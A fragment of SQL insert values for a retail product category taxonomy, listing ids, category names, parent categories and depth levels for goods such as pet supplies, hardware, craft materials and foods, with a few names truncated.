(499898,'Computer Circuit Boards',7264,'Printed Circuit Boards',3),
(499899,'Computer Inverter Boards',499898,'Computer Circuit Boards',4),
(499900,'Dog Diapers',5,'Dog Supplies',3),
(499903,'Exercise & Gym Mat Storage Racks & Carts',499799,'General Purpose Athletic Equipment',3),
(499904,'Platform & Paddle Tennis',499846,'Outdoor Games',3),
(499905,'Vegetable Mixes',5793,'Fresh & Frozen Vegetables',4),
(499906,'Fruit Mixes',5795,'Fresh & Frozen Fruits',4),
(499907,'Awnings',2918,'Outdoor Living',3),
(499908,'Awning Accessories',2918,'Outdoor Living',3),
(499912,'Power Towers',990,'Exercise & Fitness',2),
(499913,'Adult Hygienic Wipes',474,'Bath & Body',4),
(499915,'Figure Skating & Hockey',499713,'Athletics',2),
(499916,'SIM Card Ejection Tools',264,'Mobile Phone Accessories',4),
(499917,'Pet Wipes',6383,'Pet Grooming Supplies',3),
(499918,'Stamp Blocks',504643,'Art & Crafting Tool Accessories',4),
(499919,'Jewelry Cleaning Solutions & Polishes',5573,'Jewelry Cleaning & Care',2),
(499921,'Lawn Striping Kits',4566,'Lawn Mower Accessories',4),
(499922,'Lawn Rollers',3173,'Gardening Tools',4),
(499923,'Lawn Mower Mulch Kits',4566,'Lawn Mower Accessories',4),
(499924,'Food & Beverage Labels',6478,'Food Storage Accessories',3),
(499926,'Lotion & Sunscreen Applicators',2958,'Skin Care Tools',5),
(499927,'Welding Helmets',2047,'Work Safety Protective Gear',2),
(499928,'General Purpose Battery Testers',7166,'Battery Accessories',4),
(499929,'Vehicle Battery Testers',8236,'Vehicle Repair & Specialty Tools',4),
(499930,'Ironing Board Hooks & Racks',2446,'Storage Hooks & Racks',4),
(499931,'Ironing Board Replacement Parts',627,'Laundry Supplies',3),
(499932,'Specialty Electrical Switches & Relays',6459,'Electrical Switches',3),
(499933,'Springs',2878,'Hardware Accessories',2),
(499934,'Allergy Test Kits',505293,'Medical Tests',3),
(499935,'Surgical Needles & Sutures',230913,'Medical Instruments',3),
(499937,'Iron Rests',627,'Laundry Supplies',3),
(499938,'Astronomy Toys & Models',1262,'Educational Toys',3),
(499942,'Fishing Rod Holders & Storage Racks',8093,'Fishing Rod Accessories',4),
(499944,'DVI Splitters & Switches',8156,'Audio & Video Splitters & Switches',3),
(499945,'VGA Splitters & Switches',8156,'Audio & Video Splitters & Switches',3),
(499946,'Livestock Halters',6991,'Animal Husbandry',3),
(499947,'Welding Accessories',3650,'Tool Accessories',2),
(499948,'Outdoor Umbrella Enclosure Kits',6751,'Outdoor Umbrella & Sunshade Accessories',4),
(499949,'Handrails & Railing Systems',115,'Building Materials',2),
(499950,'Gesture Control Input Devices',1928,'Input Devices',4),
(499951,'Avalanche Safety',499844,'Winter Sports & Activities',3),
(499952,'Avalanche Probes',499951,'Avalanche Safety',4),
(499953,'Collectible Guns',220,'Collectible Weapons',4),
(499954,'Bird Cage Bird Baths',7385,'Bird Cage Accessories',4),
(499955,'Porch Swing Accessories',2918,'Outdoor Living',3),
(499956,'Tablet Computer Docks & Stands',279,'Computer Accessories',3),
(499958,'Safety & Crowd Control Barriers',128,'Fencing & Barriers',2),
(499959,'Saddle Covers & Cases',8107,'Saddle Accessories',5),
(499960,'Lawn Mower Mulch Plugs & Plates',4566,'Lawn Mower Accessories',4),
(499961,'Safety Knee Pads',2047,'Work Safety Protective Gear',2),
(499962,'Pot & Planter Liners',2962,'Gardening',3),
(499963,'Smoking Pipes',435,'Tobacco Products',2),
(499964,'Paddle Leashes',1120,'Boating & Rafting',4),
(499965,'Playground Balls',1266,'Sports Toys',3),
(499966,'Power Inlets',127,'Power & Electrical Supplies',2),
(499969,'Event Tickets',8,'Arts & Entertainment',1),
(499970,'Door Push Plates',6343,'Door Hardware',3),
(499971,'Sewing Baskets & Kits',505369,'Craft Organization',4),
(499972,'Sashes',167,'Clothing Accessories',2),
(499975,'Hockey Suspenders & Belts',1105,'Hockey Protective Gear',4),
(499976,'Borescopes',142,'Cameras',2),
(499978,'Exercise Machine & Equipment Sets',990,'Exercise & Fitness',2),
(499979,'Dance Dresses, Skirts & Costumes',5322,'Activewear',3),
(499981,'Casters',2878,'Hardware Accessories',2),
(499982,'Small Engines',632,'Hardware',1),
(499985,'Panel Saws',1235,'Saws',3),
(499986,'Lemon & Lime Juice',2660,'Cooking & Baking Ingredients',3),
(499988,'Prepared Meals & EntrÃ©es',5814,'Prepared Foods',3),
(499989,'Prepared Appetizers & Side Dishes',5814,'Prepared Foods',3),
(499990,'Bottle Caps',649,'Barware',3),
(499991,'Ice Cream & Frozen Yogurt',5788,'Frozen Desserts & Novelties',3),
(499992,'Hair Styling Tool Sets',6019,'Hair Styling Tools',4),
(499993,'Billiard Cue Cases',3222,'Billiard Cue Accessories',4),
(499994,'Billiard Cue Chalk',3222,'Billiard Cue Accessories',4),
(499995,'Carpentry & Woodworking Project Plans',783,'Media',1),
(499996,'Waffle Iron Accessories',2901,'Kitchen Appliance Accessories',3),
(499997,'Egg Incubators',6991,'Animal Husbandry',3),
(499998,'Camera Stabilizers & Supports',143,'Camera Parts & Accessories',3),
(499999,'Bathroom Suites',1673,'Plumbing Fixtures',3),
(500000,'Bathroom Furniture Sets',6345,'Furniture Sets',2),
(500001,'Music Lyres & Flip Folders',55,'Musical Instrument & Orchestra Accessories',3),
(500002,'Smart Glasses',278,'Computers',2),
(500003,'Floating & Submersible Lights',594,'Lighting',2),
(500004,'Cooktop, Oven & Range Accessories',2901,'Kitchen Appliance Accessories',3),
(500005,'Toy Weapon & Gadget Accessories',1253,'Toys',2),
(500007,'Cigarette Holders',600,'Smoking Accessories',2),
(500008,'Costume Tobacco Products',5192,'Costume Accessories',3),
(500009,'Activity Monitors',494,'Biometric Monitors',3),
(500013,'Tablet Computer Screens & Screen Digitizers',7349,'Tablet Computer Parts',4),
(500015,'Educational Flash Cards',1262,'Educational Toys',3),
(500016,'Power Sweepers',3798,'Outdoor Power Equipment',3),
(500024,'Ear Picks & Spoons',506,'Ear Care',3),
(500025,'Safety & Security Mirrors',359,'Business & Home Security',2),
(500026,'Pet Carrier & Crate Accessories',2,'Pet Supplies',2),
(500027,'Circuit Board Accessories',3702,'Circuit Boards & Components',2),
(500028,'Bicycle Helmet Parts & Accessories',3982,'Cycling Apparel & Accessories',4),
(500029,'Roller Skis',499761,'Inline & Roller Skating',3),
(500030,'Moving & Soundproofing Blankets & Covers',2878,'Hardware Accessories',2),
(500033,'Garden Pot Saucers & Trays',2962,'Gardening',3),
(500034,'Lawn Aerators & Dethatchers',3798,'Outdoor Power Equipment',3),
(500035,'Storage & Data Transfer Cables',259,'Cables',3),
(500036,'Cable Tie Guns',3328,'Cable Management',3),
(500037,'Camera Grips',143,'Camera Parts & Accessories',3),
(500038,'Aquarium Cleaning Supplies',6,'Fish Supplies',3),
(500039,'Dumpsters',4516,'Waste Containment',3),
(500040,'Computer Accessory Sets',279,'Computer Accessories',3),
(500042,'Pool & Spa Chlorine Generators',2832,'Pool & Spa Accessories',3),
(500043,'Humidistats',1519,'HVAC Controls',3),
(500044,'Posters, Prints, & Visual Artwork',9,'Artwork',3),
(500045,'Decorative Tapestries',9,'Artwork',3),
(500046,'Digital Artwork',5032,'Digital Goods & Currency',2),
(500048,'Gun Cases & Range Bags',2214,'Gun Care & Accessories',3),
(500049,'Armatures, Rotors & Stators',127,'Power & Electrical Supplies',2),
(500050,'Pool Cover Accessories',2832,'Pool & Spa Accessories',3),
(500051,'Floor Chairs',443,'Chairs',2),
(500052,'Mice & Trackball Accessories',6475,'Input Device Accessories',4),
(500053,'Bicycle Hub Parts',4597,'Bicycle Wheel Parts',5),
(500054,'Hardware Fasteners',2878,'Hardware Accessories',2),
(500055,'Threaded Rods',500054,'Hardware Fasteners',3),
(500056,'Zipper Pulls',505380,'Craft Fasteners & Closures',5),
(500057,'Freeze',4335,'Laboratory Equipment',3),
(500058,'Anemometers',1305,'Measuring Tools & Sensors',3),
(500059,'Cat Furniture Accessories',4,'Cat Supplies',3),
(500060,'Back Scratchers',5663,'Massage & Relaxation',3),
(500061,'Office Furniture Sets',6362,'Office Furniture',2),
(500062,'Aquarium Temperature Controllers',6,'Fish Supplies',3),
(500063,'Water Heater Expansion Tanks',2751,'Water Heater Accessories',3),
(500064,'Sectional Sofa Units',7212,'Sofa Accessories',2),
(500065,'Descalers & Decalcifiers',4973,'Household Cleaning Products',4),
(500066,'Electric Kettle Accessories',2901,'Kitchen Appliance Accessories',3),
(500067,'Bicycle Child Seat Accessories',3214,'Bicycle Accessories',4),
(500074,'Marinades & Grilling Sauces',427,'Condiments & Sauces',3),
(500075,'Relish & Chutney',427,'Condiments & Sauces',3),
(500076,'Pickled Fruits & Vegetables',427,'Condiments & Sauces',3),
(500077,'Vehicle Wheel Clamps',2768,'Vehicle Alarms & Locks',4),
(500078,'Bird & Wildlife Houses',696,'Decor',2),
(500079,'Bat Houses',500078,'Bird & Wildlife Houses',3),
(500080,'Butterfly Houses',500078,'Bird & Wildlife Houses',3),
(500081,'Ultrasonic Cleaners',604,'Household Appliances',2),
(500082,'Jewelry Cleaning Tools',5573,'Jewelry Cleaning & Care',2),
(500083,'Jewelry Steam Cleaners',5573,'Jewelry Cleaning & Care',2),
(500084,'Pet Bed Accessories',2,'Pet Supplies',2),
(500085,'Washer & Dryer Accessories',3456,'Laundry Appliance Accessories',3),
(500086,'Janitorial Carts & Caddies',111,'Business & Industrial',1),
(500087,'Light Therapy Lamps',491,'Health Care',2),
(500088,'Lighter Fluid',2277,'Chemicals',3),
(500089,'Sweet and Sour Sauces',427,'Condiments & Sauces',3),
(500090,'Air & Filter Dryers',499873,'Heating, Ventilation & Air Conditioning',2),
(500091,'Speed Radars',222,'Electronics',1),
(500092,'Bicycle Handlebar Grips & Decor',3214,'Bicycle Accessories',4),
(500093,'Canned & Dry Milk',2660,'Cooking & Baking Ingredients',3),
(500094,'Art Fixatives',505378,'Craft Paint, Ink & Glaze',5),
(500095,'Water Parks & Slides',6464,'Water Play Equipment',3),
(500096,'Hardware Pumps',632,'Hardware',1),
(500097,'Sprinkler, Booster & Irrigation System Pumps',500096,'Hardware Pumps',2),
(500098,'Pool, Fountain & Pond Pumps',500096,'Hardware Pumps',2),
(500099,'Home Appliance Pumps',500096,'Hardware Pumps',2),
(500100,'Well Pumps & Systems',500096,'Hardware Pumps',2),
(500101,'Utility Pumps',500096,'Hardware Pumps',2),
(500102,'Sump, Sewage & Effluent Pumps',500096,'Hardware Pumps',2),
(500103,'Tool Organizer Liners & Inserts',3974,'Tool Storage & Organization',3),
(500104,'Camera Focus Devices',143,'Camera Parts & Accessories',3),
(500105,'White & Cream Sauces',427,'Condiments & Sauces',3),
(500106,'Printers, Copiers & Fax Machines',345,'Print, Copy, Scan & Fax',2),
(500107,'On',143,'Camera Parts & Accessories',3),
(500109,'Electric Bicycle Conversion Kits',3214,'Bicycle Accessories',4),
(500110,'Pet Heating Pad Accessories',2,'Pet Supplies',2),
(500111,'Outdoor Sectional Sofa Units',6368,'Outdoor Seating',3),
(500112,'Speaker Bags, Covers & Cases',7163,'Speaker Accessories',4),
(500113,'Fingerboards & Fingerboard Sets',1266,'Sports Toys',3),
(500114,'Laboratory Freezers',4335,'Laboratory Equipment',3),
(500115,'Waste Container Labels & Signs',6757,'Waste Containment Accessories',3),
(500117,'Video Game Console & Controller Batteries',276,'Batteries',4),
(500118,'Costume Special Effects',5192,'Costume Accessories',3),
(500119,'Tactile Transducers',7163,'Speaker Accessories',4),
(500120,'Speaker Components & Kits',7163,'Speaker Accessories',4),
(500121,'Home Fragrance Accessories',696,'Decor',2),
(500122,'Candle Snuffers',500121,'Home Fragrance Accessories',3),
(502966,'Popcorn & French Fry Scoops',3175,'Scoops',4),
(502969,'Transfer Boards & Sheets',520,'Accessibility Equipment',4),
(502970,'Field Hockey & Lacrosse Pads',499744,'Field Hockey & Lacrosse Protective Gear',4),
(502972,'Party Supply Kits',96,'Party Supplies',3),
(502973,'Fence Panels',128,'Fencing & Barriers',2),
(502974,'Dry Boxes',5181,'Luggage & Bags',1),
(502975,'Fuel Containers & Tanks',632,'Hardware',1),
(502976,'Shochu & Soju',417,'Liquor & Spirits',4),
(502977,'Chain, Wire & Rope',2878,'Hardware Accessories',2),
(502978,'Gear Ties',503773,'Hooks, Buckles & Fasteners',3),
(502979,'Jewelry Making Kits',505370,'Art & Craft Kits',4),
(502980,'Bottling Bottles',3577,'Homebrewing & Winemaking Supplies',3),
(502981,'Party Streamers & Curtains',96,'Party Supplies',3),
(502982,'Pet Waste Bag Dispensers & Holders',2,'Pet Supplies',2),
(502983,'Fence & Gate Accessories',128,'Fencing & Barriers',2),
(502984,'Lattice',128,'Fencing & Barriers',2),
(502986,'Garden Borders & Edging',128,'Fencing & Barriers',2),
(502987,'Maternity Belts & Support Bands',167,'Clothing Accessories',2),
(502988,'Hair Pins, Claws & Clips',171,'Hair Accessories',3),
(502989,'Soda Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(502990,'Printer, Copier & Fax Machine Accessories',345,'Print, Copy, Scan & Fax',2),
(502991,'Printer, Copier & Fax Machine Replacement Parts',502990,'Printer, Copier & Fax Machine Accessories',3),
(502992,'Utility Buckles',503773,'Hooks, Buckles & Fasteners',3),
(502993,'Portable Toilets & Showers',1013,'Camping & Hiking',3),
(502994,'Portable Showers & Privacy Enclosures',502993,'Portable Toilets & Showers',4),
(502995,'Touch Table Computers',278,'Computers',2),
(502996,'False Eyelash Accessories',2548,'Makeup Tools',5),
(502999,'Changing Mat & Tray Covers',548,'Diapering',2),
(503000,'Hourglasses',696,'Decor',2),
(503001,'Audio Converters',2182,'Converters',3),
(503002,'Tablet Computer Housings & Trim',7349,'Tablet Computer Parts',4),
(503003,'Keyboard Keys & Caps',6475,'Input Device Accessories',4),
(503004,'Headphone Cushions & Tips',505797,'Headphone & Headset Accessories',4),
(503005,'Funnels',668,'Kitchen Tools & Utensils',3),
(503006,'Gait Belts',3477,'Medical Equipment',3),
(503007,'Measuring Scale Accessories',5526,'Measuring Tool & Sensor Accessories',3),
(503008,'Audio & Video Receiver Accessories',1420,'Audio Accessories',3),
(503009,'Portable Toilets & Urination Devices',502993,'Portable Toilets & Showers',4),
(503010,'Flag & Windsock Pole Mounting Hardware & Kits',7419,'Flag & Windsock Accessories',3),
(503011,'Pallets & Loading Platforms',6987,'Material Handling',2),
(503014,'Dry Box Liners & Inserts',110,'Luggage Accessories',2),
(503016,'Tripod Spreaders',4638,'Tripod & Monopod Accessories',3),
(503017,'Studio Stand & Mount Accessories',42,'Lighting & Studio',3),
(503018,'Studio Light & Flash Accessories',42,'Lighting & Studio',3),
(503019,'Camera Sun Hoods & Viewfinder Attachments',143,'Camera Parts & Accessories',3),
(503020,'Camera Silencers & Sound Blimps',143,'Camera Parts & Accessories',3),
(503021,'Gun Cleaning',2214,'Gun Care & Accessories',3),
(503026,'Reloading Supplies & Equipment',2214,'Gun Care & Accessories',3),
(503028,'Special Effects Light Stands',408,'Special Effects',3),
(503032,'Guitar Fittings & Parts',3502,'Guitar Accessories',5),
(503033,'Orchestral String Instrument Accessories',61,'String Instrument Accessories',4),
(503034,'Orchestral String Instrument Strings',503033,'Orchestral String Instrument Accessories',5),
(503035,'Orchestral String Instrument Stands',503033,'Orchestral String Instrument Accessories',5),
(503036,'Orchestral String Instrument Pickups',503033,'Orchestral String Instrument Accessories',5),
(503037,'Orchestral String Instrument Mutes',503033,'Orchestral String Instrument Accessories',5),
(503038,'Orchestral String Instrument Fittings & Parts',503033,'Orchestral String Instrument Accessories',5),
(503039,'Orchestral String Instrument Cases',503033,'Orchestral String Instrument Accessories',5),
(503040,'Orchestral String Instrument Bows',503033,'Orchestral String Instrument Accessories',5),
(503348,'Sewing Machine Replacement Parts',504643,'Art & Crafting Tool Accessories',4),
(503721,'Guitar String Winders',3502,'Guitar Accessories',5),
(503722,'Laboratory Funnels',4335,'Laboratory Equipment',3),
(503723,'Aisle Runners',5455,'Wedding Ceremony Supplies',2),
(503724,'Protective Masks',2047,'Work Safety Protective Gear',2),
(503725,'Cooking Gel Fuels',6944,'Fondue Set Accessories',4),
(503726,'Tripod Handles',4638,'Tripod & Monopod Accessories',3),
(503727,'Door Frames',6343,'Door Hardware',3),
(503728,'Window Frames',499772,'Window Hardware',3),
(503729,'Wire Terminals & Connectors',127,'Power & Electrical Supplies',2),
(503730,'Locks & Latches',1974,'Locks & Keys',2),
(503731,'Metal Casting Molds',2878,'Hardware Accessories',2),
(503733,'Pet Fragrances & Deodorizing Sprays',6383,'Pet Grooming Supplies',3),
(503734,'Sugar & Sweeteners',2660,'Cooking & Baking Ingredients',3),
(503735,'Photo Mounting Supplies',39,'Photography',2),
(503736,'Coffee Maker & Espresso Machine Replacement Parts',3988,'Coffee Maker & Espresso Machine Accessories',4),
(503737,'Electrical Testing Tools',1305,'Measuring Tools & Sensors',3),
(503738,'Varnishes & Finishes',503740,'Painting Consumables',3),
(503739,'Building Consumables',632,'Hardware',1),
(503740,'Painting Consumables',503739,'Building Consumables',2),
(503741,'Solvents, Strippers & Thinners',503739,'Building Consumables',2),
(503742,'Hardware Glue & Adhesives',503739,'Building Consumables',2),
(503743,'Masonry Consumables',503739,'Building Consumables',2),
(503744,'Protective Coatings & Sealants',503739,'Building Consumables',2),
(503745,'Craft & Office Glue',505376,'Crafting Adhesives & Magnets',5),
(503746,'Tape Dispensers',2986,'Office Instruments',2),
(503747,'Recorder Accessories',62,'Woodwind Instrument Accessories',4),
(503748,'Recorder Cases',503747,'Recorder Accessories',5),
(503749,'Recorder Care & Cleaning',503747,'Recorder Accessories',5),
(503750,'Recorder Parts',503747,'Recorder Accessories',5),
(503751,'Pool Liners',2832,'Pool & Spa Accessories',3),
(503752,'Racquetball & Squash',499713,'Athletics',2),
(503753,'Racquetball & Squash Balls',503752,'Racquetball & Squash',3),
(503755,'Riser Cards',287,'I/O Cards & Adapters',4),
(503756,'Gardening Scooters, Seats & Kneelers',5632,'Gardening Accessories',4),
(503757,'Muddlers',651,'Cocktail Shakers & Tools',4),
(503758,'Scrapbooking & Stamping Kits',505370,'Art & Craft Kits',4),
(503759,'Citrus Fruits',5795,'Fresh & Frozen Fruits',4),
(503760,'Stone Fruits',5795,'Fresh & Frozen Fruits',4),
(503761,'Sprouts',5793,'Fresh & Frozen Vegetables',4),
(503762,'Nursing Pads & Shields',561,'Nursing & Feeding',2),
(503763,'Gymnastics Bars & Balance Beams',1000,'Gymnastics',3),
(503764,'Chain Connectors & Links',503773,'Hooks, Buckles & Fasteners',3),
(503765,'Office Furniture Accessories',436,'Furniture',1),
(503766,'Desk Parts & Accessories',503765,'Office Furniture Accessories',2),
(503767,'Personnel Lifts',131,'Lifts & Hoists',3),
(503768,'Hoists, Cranes & Trolleys',131,'Lifts & Hoists',3),
(503769,'Pulleys, Blocks & Sheaves',131,'Lifts & Hoists',3),
(503770,'Lifting Hooks, Clamps & Shackles',503773,'Hooks, Buckles & Fasteners',3),
(503771,'Jacks & Lift Trucks',131,'Lifts & Hoists',3),
(503772,'Winches',131,'Lifts & Hoists',3),
(503773,'Hooks, Buckles & Fasteners',2878,'Hardware Accessories',2),
(503774,'Lighters & Matches',1167,'Tools',2),
(503775,'Siding',115,'Building Materials',2),
(503776,'Drywall',115,'Building Materials',2),
(503777,'Rebar & Remesh',115,'Building Materials',2),
(504419,'Wreath & Floral Frames',505381,'Craft Shapes & Bases',5),
(504633,'Rice Keepers',5103,'Food Warmers',4),
(504634,'Bidet Faucets & Sprayers',2691,'Toilet & Bidet Accessories',4),
(504635,'Plumbing Fixture Hardware & Parts',133,'Plumbing',2),
(504636,'Drains',504635,'Plumbing Fixture Hardware & Parts',3),
(504637,'Drain Components',504635,'Plumbing Fixture Hardware & Parts',3),
(504638,'Shower Arms & Connectors',2206,'Shower Parts',4),
(504639,'Art & Crafting Tools',16,'Arts & Crafts',3),
(504640,'Craft Cutting & Embossing Tools',504639,'Art & Crafting Tools',4),
(504641,'Craft & Office Scissors',504640,'Craft Cutting & Embossing Tools',5),
(504642,'Craft Cutters & Embossers',504640,'Craft Cutting & Embossing Tools',5),
(504643,'Art & Crafting Tool Accessories',16,'Arts & Crafts',3),
(505284,'Racquet Sport Toys',1266,'Sports Toys',3),
(505285,'Plant & Herb Growing Kits',985,'Plants',2),
(505286,'Sewing Machine Extension Tables',504643,'Art & Crafting Tool Accessories',4),
(505287,'Quilts & Comforters',569,'Bedding',3),
(505288,'Conductor Batons',55,'Musical Instrument & Orchestra Accessories',3),
(505291,'Wakeboard Parts',3282,'Wakeboarding',5),
(505292,'Gardening Sickles & Machetes',3173,'Gardening Tools',4),
(505293,'Medical Tests',491,'Health Care',2),
(505294,'Urinary Tract Infection Tests',505293,'Medical Tests',3),
(505295,'Power Adapters & Chargers',275,'Power',3),
(505296,'Ski Binding Parts',499845,'Skiing & Snowboarding',4),
(505297,'Pet Waste Disposal Systems & Tools',2,'Pet Supplies',2),
(505298,'Studio Recording Bundles',2165,'Audio Components',3),
(505299,'Computer Interface Cards & Adapters',287,'I/O Cards & Adapters',4),
(505300,'Weather Stripping & Weatherization Supplies',115,'Building Materials',2),
(505301,'Peaches & Nectarines',503760,'Stone Fruits',5),
(505302,'Sport Safety Lights & Reflectors',990,'Exercise & Fitness',2),
(505303,'Aquarium & Pond Tubing',6,'Fish Supplies',3),
(505304,'Pet Training Pad Holders',505314,'Pet Training Aids',3),
(505305,'Plumbing Primer',503739,'Building Consumables',2),
(505306,'Aquarium Fish Nets',6,'Fish Supplies',3),
(505307,'Aquarium Air Stones & Diffusers',6,'Fish Supplies',3),
(505308,'Brass Instrument Mouthpieces',57,'Brass Instrument Accessories',4),
(505309,'Brass Instrument Straps & Stands',57,'Brass Instrument Accessories',4),
(505310,'Brass Instrument Cases & Gigbags',57,'Brass Instrument Accessories',4),
(505311,'Pet Training Sprays & Solutions',505314,'Pet Training Aids',3),
(505312,'Oil Lamp Fuel',2956,'Lighting Accessories',2),
(505313,'Pet Training Clickers & Treat Dispensers',505314,'Pet Training Aids',3),
(505314,'Pet Training Aids',2,'Pet Supplies',2),
(505315,'Punches & Awls',1167,'Tools',2),
(505316,'Food & Drink Stencils',668,'Kitchen Tools & Utensils',3),
(505317,'Kiteboard & Wakeboard Bindings',3282,'Wakeboarding',5),
(505318,'Voltage Transformers & Regulators',127,'Power & Electrical Supplies',2),
(505319,'Electrical Freeze Sprays',2277,'Chemicals',3),
(505320,'Wall Jacks & Braces',2878,'Hardware Accessories',2),
(505321,'Gardening Tool Heads',505326,'Gardening Tool Accessories',4),
(505322,'Gardening Tool Handles',505326,'Gardening Tool Accessories',4),
(505323,'Mattock & Pickaxe Accessories',3650,'Tool Accessories',2),
(505324,'Mattock & Pickaxe Handles',505323,'Mattock & Pickaxe Accessories',3),
(505325,'Paint Strainers',2077,'Paint Tools',3),
(505326,'Gardening Tool Accessories',2962,'Gardening',3),
(505327,'Cocktail Strainers',651,'Cocktail Shakers & Tools',4),
(505328,'Music Benches & Stools',55,'Musical Instrument & Orchestra Accessories',3),
(505329,'Turnips & Rutabagas',5793,'Fresh & Frozen Vegetables',4),
(505330,'Air Hockey Equipment',1002,'Air Hockey',3),
(505352,'Therapeutic Swings',5870,'Occupational & Physical Therapy Equipment',3),
(505354,'Squashes & Gourds',5793,'Fresh & Frozen Vegetables',4),
(505364,'Powered Hammers',1186,'Hammers',3),
(505365,'Metronomes',55,'Musical Instrument & Orchestra Accessories',3),
(505366,'Breast Pump Accessories',561,'Nursing & Feeding',2),
(505367,'Orthodontic Appliance Cases',526,'Oral Care',3),
(505368,'Bathtub Bases & Feet',2996,'Bathtub Accessories',4),
(505369,'Craft Organization',16,'Arts & Crafts',3),
(505370,'Art & Craft Kits',16,'Arts & Crafts',3),
(505371,'Crafting Patterns & Molds',16,'Arts & Crafts',3),
(505372,'Art & Crafting Materials',16,'Arts & Crafts',3),
(505373,'Needlecraft Patterns',505371,'Crafting Patterns & Molds',4),
(505374,'Candle Making Kits',505370,'Art & Craft Kits',4),
(505375,'Raw Candle Wax',505372,'Art & Crafting Materials',4),
(505376,'Crafting Adhesives & Magnets',505372,'Art & Crafting Materials',4),
(505377,'Crafting Wire',505372,'Art & Crafting Materials',4),
(505378,'Craft Paint, Ink & Glaze',505372,'Art & Crafting Materials',4),
(505379,'Embellishments & Trims',505372,'Art & Crafting Materials',4),
(505380,'Craft Fasteners & Closures',505372,'Art & Crafting Materials',4),
(505381,'Craft Shapes & Bases',505372,'Art & Crafting Materials',4),
(505382,'Crafting Fibers',505372,'Art & Crafting Materials',4),
(505383,'Leather & Vinyl',505372,'Art & Crafting Materials',4),
(505384,'Textiles',505372,'Art & Crafting Materials',4),
(505386,'Craft Decoration Makers',504639,'Art & Crafting Tools',4),
(505387,'Thread & Yarn Tools',504639,'Art & Crafting Tools',4),
(505388,'Textile Craft Machines',504639,'Art & Crafting Tools',4),
(505391,'Color Mixing Tools',504639,'Art & Crafting Tools',4),
(505392,'Craft Measuring & Marking Tools',504639,'Art & Crafting Tools',4),
(505393,'Needles & Hooks',504639,'Art & Crafting Tools',4),
(505394,'Needle, Pin & Hook Organizers',505369,'Craft Organization',4),
(505395,'Thread & Yarn Organizers',505369,'Craft Organization',4),
(505396,'Printable Fabric',505384,'Textiles',5),
(505397,'Crafting Canvas',505384,'Textiles',5),
(505399,'Cardstock & Scrapbooking Paper',24,'Art & Craft Paper',5),
(505400,'Drawing & Painting Paper',24,'Art & Craft Paper',5),
(505401,'Papier Mache Mixes',44,'Pottery & Sculpting Materials',5),
(505402,'Pottery Slips',44,'Pottery & Sculpting Materials',5),
(505403,'Papier Mache Shapes',505381,'Craft Shapes & Bases',5),
(505404,'Craft Wood & Shapes',505381,'Craft Shapes & Bases',5),
(505405,'Pillow Forms',6142,'Filling & Padding Material',5),
(505406,'Filling Pellets',6142,'Filling & Padding Material',5),
(505407,'Batting & Stuffing',6142,'Filling & Padding Material',5),
(505408,'Clasps & Hooks',505380,'Craft Fasteners & Closures',5),
(505409,'Eyelets & Grommets',505380,'Craft Fasteners & Closures',5),
(505410,'Sequins & Glitter',505379,'Embellishments & Trims',5),
(505411,'Feathers',505379,'Embellishments & Trims',5),
(505412,'Ribbons & Trim',505379,'Embellishments & Trims',5),
(505413,'Bows & Yo',505379,'Embellishments & Trims',5),
(505414,'Ink Pads',505378,'Craft Paint, Ink & Glaze',5),
(505415,'Craft Dyes',505378,'Craft Paint, Ink & Glaze',5),
(505416,'Art Ink',505378,'Craft Paint, Ink & Glaze',5),
(505417,'Art & Craft Paint',505378,'Craft Paint, Ink & Glaze',5),
(505418,'Floral Wire',505377,'Crafting Wire',5),
(505419,'Decorative Tape',505376,'Crafting Adhesives & Magnets',5),
(505420,'Wood Burning Tools',505392,'Craft Measuring & Marking Tools',5),
(505421,'Mechanical Looms',505388,'Textile Craft Machines',5),
(505422,'Hand Looms',505388,'Textile Craft Machines',5),
(505666,'Food Mixers & Blenders',730,'Kitchen Appliances',3),
(505667,'Outdoor Grill Replacement Parts',3684,'Outdoor Grill Accessories',4),
(505668,'Bicycle Tools',3214,'Bicycle Accessories',4),
(505669,'Steam Inhalers',4551,'Respiratory Care',3),
(505670,'Hairdressing Capes & Neck Covers',7240,'Hairdressing & Cosmetology',2),
(505761,'Absinthe',417,'Liquor & Spirits',4),
(505762,'Ammunition Cases & Holders',2214,'Gun Care & Accessories',3),
(505763,'Chair Sashes',96,'Party Supplies',3),
(505764,'Beds & Bed Frames',6433,'Beds & Accessories',2),
(505765,'Food Mixer & Blender Accessories',2901,'Kitchen Appliance Accessories',3),
(505766,'Motor Vehicle A/V Players & In',8526,'Motor Vehicle Electronics',3),
(505767,'Hard Drive Enclosures & Mounts',1623,'Hard Drive Accessories',5),
(505768,'Brass Instrument Mutes',57,'Brass Instrument Accessories',4),
(505769,'Alto & Baritone Horns',63,'Brass Instruments',4),
(505770,'Trumpets & Cornets',63,'Brass Instruments',4),
(505771,'Headphones & Headsets',2165,'Audio Components',3),
(505772,'Ski & Snowboard Tuning Tools',499845,'Skiing & Snowboarding',4),
(505797,'Headphone & Headset Accessories',1420,'Audio Accessories',3),
(505801,'Electronic Card Readers',1928,'Input Devices',4),
(505802,'Wall Patching Compounds & Plaster',503739,'Building Consumables',2),
(505803,'Bed Canopies',569,'Bedding',3),
(505804,'Plaster Gauze',44,'Pottery & Sculpting Materials',5),
(505805,'Mounting Putty',932,'General Office Supplies',2),
(505806,'Beverage Tubs & Chillers',649,'Barware',3),
(505808,'Credit Card Terminals',505825,'Cash Register & POS Terminal Accessories',4),
(505809,'Seasonal Village Sets & Accessories',596,'Seasonal & Holiday Decorations',3),
(505810,'Tool Handle Wedges',3650,'Tool Accessories',2),
(505811,'Pet Door Accessories',2,'Pet Supplies',2),
(505812,'Wedge Tools',3650,'Tool Accessories',2),
(505813,'Field & Court Boundary Markers',6739,'Coaching & Officiating',3),
(505814,'Watering Can Accesssories',3568,'Watering & Irrigation',3),
(505815,'Pool & Spa Maintenance Kits',2832,'Pool & Spa Accessories',3),
(505817,'Skateboard Small Parts',3670,'Skateboard Parts',4),
(505818,'Play Dough & Putty',3731,'Art & Drawing Toys',3),
(505819,'Activity Monitor Accessories',5071,'Biometric Monitor Accessories',3),
(505820,'Conductivity Gels & Lotions',491,'Health Care',2),
(505821,'Livestock Feed',6991,'Animal Husbandry',3),
(505822,'Fertility Monitors and Ovulation Tests',494,'Biometric Monitors',3),
(505824,'Cash Registers & POS Terminals',4181,'Money Handling',3),
(505825,'Cash Register & POS Terminal Accessories',4181,'Money Handling',3),
(505826,'Night Lights & Ambient Lighting',594,'Lighting',2),
(505827,'Clock Parts',696,'Decor',2),
(505828,'Ostomy Supplies',2907,'Medical Supplies',3),
